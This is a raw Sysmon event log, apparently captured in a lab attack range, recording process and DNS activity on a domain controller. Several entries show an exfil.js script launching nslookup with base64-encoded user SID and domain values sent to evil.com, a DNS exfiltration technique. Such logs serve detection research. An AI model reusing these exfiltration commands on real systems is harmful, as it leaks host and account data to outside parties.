C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AF-629A-A53E-000000005F02}336C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlehw.tmp 2>&1 10341000x8000000000000000196273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.222{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AF-629A-A63E-000000005F02}2256C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.222{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AF-629A-A63E-000000005F02}2256C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.200{2E1864BB-17AF-629A-A63E-000000005F02}22562848C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-A53E-000000005F02}336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.200{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-A63E-000000005F02}2256C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.185{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-A53E-000000005F02}336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.185{2E1864BB-17A1-629A-783D-000000005F02}55526436C:\Windows\System32\WScript.exe{2E1864BB-17AF-629A-A53E-000000005F02}336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.185{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.185{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.185{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.185{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.189{2E1864BB-17AF-629A-A53E-000000005F02}336C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlehw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.185{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzcuotw.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.101{2E1864BB-17AF-629A-A33E-000000005F02}59808028C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-A43E-000000005F02}7508C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.101{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.101{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.101{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.101{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.101{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-A43E-000000005F02}7508C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.101{2E1864BB-17AF-629A-A23E-000000005F02}75842060C:\Windows\system32\cmd.exe{2E1864BB-17AF-629A-A43E-000000005F02}7508C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.107{2E1864BB-17AF-629A-A43E-000000005F02}7508C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AF-629A-A23E-000000005F02}7584C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzcuotw.tmp 2>&1 354300x8000000000000000196253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.672{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52316- 354300x8000000000000000196252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.672{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52315- 354300x8000000000000000196251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.671{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52314- 354300x8000000000000000196250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.671{00000000-0000-0000-0000-000000000000}4468<unknown process>-udptruefalse127.0.0.1-52314-false127.0.0.1-53domain 354300x8000000000000000196249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.506{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52313- 354300x8000000000000000196248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.505{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52312- 354300x8000000000000000196247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.505{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52311- 354300x8000000000000000196246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.505{00000000-0000-0000-0000-000000000000}7264<unknown process>-udptruefalse127.0.0.1-52311-false127.0.0.1-53domain 354300x8000000000000000196245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.358{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52310- 354300x8000000000000000196244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.358{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52309- 354300x8000000000000000196243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.357{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52308- 354300x8000000000000000196242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.216{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52307- 354300x8000000000000000196241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.216{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52306- 354300x8000000000000000196240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.216{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52305- 354300x8000000000000000196239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.216{00000000-0000-0000-0000-000000000000}1276<unknown process>-udptruefalse127.0.0.1-52305-false127.0.0.1-53domain 354300x8000000000000000196238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.109{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52303- 354300x8000000000000000196237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.109{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52302- 354300x8000000000000000196236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.109{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52301- 354300x8000000000000000196235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.108{00000000-0000-0000-0000-000000000000}908<unknown process>-udptruefalse127.0.0.1-52301-false127.0.0.1-53domain 354300x8000000000000000196234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.957{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52300- 354300x8000000000000000196233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.956{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52299- 354300x8000000000000000196232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.955{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52298- 354300x8000000000000000196231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.955{00000000-0000-0000-0000-000000000000}7960<unknown process>-udptruefalse127.0.0.1-52298-false127.0.0.1-53domain 354300x8000000000000000196230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.805{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52297- 354300x8000000000000000196229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.805{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52296- 354300x8000000000000000196228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.805{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52295- 354300x8000000000000000196227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.804{00000000-0000-0000-0000-000000000000}7252<unknown process>-udptruefalse127.0.0.1-52295-false127.0.0.1-53domain 354300x8000000000000000196226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.675{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52294- 354300x8000000000000000196225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.674{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52293- 354300x8000000000000000196224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.674{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52292- 354300x8000000000000000196223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.674{00000000-0000-0000-0000-000000000000}6520<unknown process>-udptruefalse127.0.0.1-52292-false127.0.0.1-53domain 354300x8000000000000000196222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.545{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52291- 354300x8000000000000000196221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.545{00000000-0000-0000-0000-000000000000}8076<unknown process>-udptruefalse127.0.0.1-52291-false127.0.0.1-53domain 354300x8000000000000000196220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.462{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52290- 